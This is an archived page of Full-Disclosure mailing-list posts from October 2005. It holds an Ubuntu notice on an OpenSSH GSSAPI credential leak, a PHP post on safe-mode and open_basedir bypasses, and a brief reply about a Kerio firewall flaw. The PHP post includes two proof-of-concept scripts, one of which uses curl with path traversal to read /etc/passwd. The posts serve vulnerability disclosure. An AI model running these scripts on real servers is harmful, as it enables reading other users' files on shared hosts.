The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0



[Full-disclosure] [USN-208-1] SSH server vulnerability

2005-10-17 Thread Martin Pitt
===
Ubuntu Security Notice USN-208-1   October 17, 2005
openssh vulnerability
CAN-2005-2798
===

A security issue affects the following Ubuntu releases:

Ubuntu 4.10 (Warty Warthog)
Ubuntu 5.04 (Hoary Hedgehog)

The following packages are affected:

openssh-server

The problem can be corrected by upgrading the affected package to
version 1:3.8.1p1-11ubuntu3.2 (for Ubuntu 4.10), or 1:3.9p1-1ubuntu2.1
(for Ubuntu 5.04).  In general, a standard system upgrade is
sufficient to effect the necessary changes.

Details follow:

An information disclosure vulnerability has been found in the SSH
server. When the GSSAPIAuthentication option was enabled, the SSH
server could send GSSAPI credentials even to users who attempted to
log in with a method other than GSSAPI. This could inadvertently
expose these credentials to an untrusted user.

Please note that this does not affect the default configuration of the
SSH server.


Updated packages for Ubuntu 4.10:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_3.8.1p1-11ubuntu3.2.diff.gz
  Size/MD5:   145915 b3fde6ad57fa71c6fedd0d857a41b98d

http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_3.8.1p1-11ubuntu3.2.dsc
  Size/MD5:  878 24b7a0d1b0bc1b12b4bfcdbe6523175f

http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_3.8.1p1.orig.tar.gz
  Size/MD5:   795948 9ce6f2fa5b2931ce2c4c25f3af9ad50d

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh_3.8.1p1-11ubuntu3.2_all.deb
  Size/MD5:30068 9ef84fcec461c2890a1623499383b845

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)


http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client-udeb_3.8.1p1-11ubuntu3.2_amd64.udeb
  Size/MD5:   159440 464c3d1ddad5e743c3f87fab0801bd91

http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client_3.8.1p1-11ubuntu3.2_amd64.deb
  Size/MD5:   524028 51bda380ea97ef5d49d475b4d210fb6d

http://security.ubuntu.com/ubuntu/pool/universe/o/openssh/openssh-server-udeb_3.8.1p1-11ubuntu3.2_amd64.udeb
  Size/MD5:   176150 f0456146f631cb925407693de6c707ae

http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server_3.8.1p1-11ubuntu3.2_amd64.deb
  Size/MD5:   263790 a5014d5e2e28be860944fee7087c2d30

http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh-askpass-gnome_3.8.1p1-11ubuntu3.2_amd64.deb
  Size/MD5:53286 933c38274907edc3033e5728beb8a7f0

  i386 architecture (x86 compatible Intel/AMD)


http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client-udeb_3.8.1p1-11ubuntu3.2_i386.udeb
  Size/MD5:   133700 91e3983782270ba83ead5fdf75cf6056

http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client_3.8.1p1-11ubuntu3.2_i386.deb
  Size/MD5:   473980 57c5dd711cb4bba5af54b377ddf25727

http://security.ubuntu.com/ubuntu/pool/universe/o/openssh/openssh-server-udeb_3.8.1p1-11ubuntu3.2_i386.udeb
  Size/MD5:   146854 94bae5597a13d613d1a7fe6d34e8312c

http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server_3.8.1p1-11ubuntu3.2_i386.deb
  Size/MD5:   241586 3761cc46ab91630196103390b86d36f4

http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh-askpass-gnome_3.8.1p1-11ubuntu3.2_i386.deb
  Size/MD5:52956 35adb2d5dafd2b25d0aaa73c87b8231c

  powerpc architecture (Apple Macintosh G3/G4/G5)


http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client-udeb_3.8.1p1-11ubuntu3.2_powerpc.udeb
  Size/MD5:   151096 34eaad307c336ec22cdd062ab8343918

http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client_3.8.1p1-11ubuntu3.2_powerpc.deb
  Size/MD5:   520822 be831a5152a07823c8a3642de79c23c3

http://security.ubuntu.com/ubuntu/pool/universe/o/openssh/openssh-server-udeb_3.8.1p1-11ubuntu3.2_powerpc.udeb
  Size/MD5:   160176 aae5f5a422bc2086c78581b05f6eb71b

http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server_3.8.1p1-11ubuntu3.2_powerpc.deb
  Size/MD5:   257946 0960bfb03e1682d28086d5b11bc55f51

http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh-askpass-gnome_3.8.1p1-11ubuntu3.2_powerpc.deb
  Size/MD5:54404 5729a05da0f88afe145a38ac80c92ae5

Updated packages for Ubuntu 5.04:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_3.9p1-1ubuntu2.1.diff.gz
  Size/MD5:   139063 63d2f62b292d2ac8baec90117878dbbd

http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_3.9p1-1ubuntu2.1.dsc
  Size/MD5:  866 a4fce3d18d282f646942b15fb7a26915

http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_3.9p1.orig.tar.gz
  Size/MD5:   832804 530b1dcbfe7a4a4ce4959c0775b85a5a

  Architecture independent packages:



[Full-disclosure] PHP Safedir Restriction Bypass Vulnerabilities

2005-10-17 Thread peter MC tachatte
There is a vulnerability (Safedir Restriction Bypass) identified within the GD extension affecting the following functions:

- imagegif()
- imagepng()
- imagejpeg()

in /ext/gd/gd.c line 1647

Which is now fixed in the cvs: http://cvs.php.net/co.php/php-src/ext/gd/gd.c?r=1.312.2.1#1786

POC:
with an image like http://81.57.125.106/~slythers/file.gif

<?php
  $im = imagecreatefromgif("file.gif");
  imagegif($im, '/var/www/f34r.fr/c/f/elbossoso/.i.need.money.php');
?>

curl openbasedir and safemode bypass.
POC:

<?php
mkdir("./".$_SERVER["SCRIPT_NAME"]."?");
$ch = curl_init("file://".$_SERVER["SCRIPT_FILENAME"]."?/../../../../../../../../../../../etc/passwd");
$file=curl_exec($ch);
echo $file;
?>

As you notice, we can bypass the safedir which leads to access to any files on any shared servers. This is fixed in the cvs.
[EMAIL PROTECTED]
greets: david coallier [EMAIL PROTECTED]

Re: [Full-disclosure] Kerio Personal Firewall and Kerio Server Firewall FWDRV driver Local Denial of Service

2005-10-17 Thread Paul Laudanski
On Thu, 13 Oct 2005, Piotr Bania wrote:

>    Kerio Technologies Kerio Personal Firewall and Kerio Server
>    Firewall FWDRV driver
>    Local denial of service
>    by Piotr Bania [EMAIL PROTECTED]

Part of the problem here is that KPF has reached end of life and will no 
longer be developed.

-- 
Paul Laudanski, Microsoft MVP Windows-Security
CastleCops(SM), http://castlecops.com

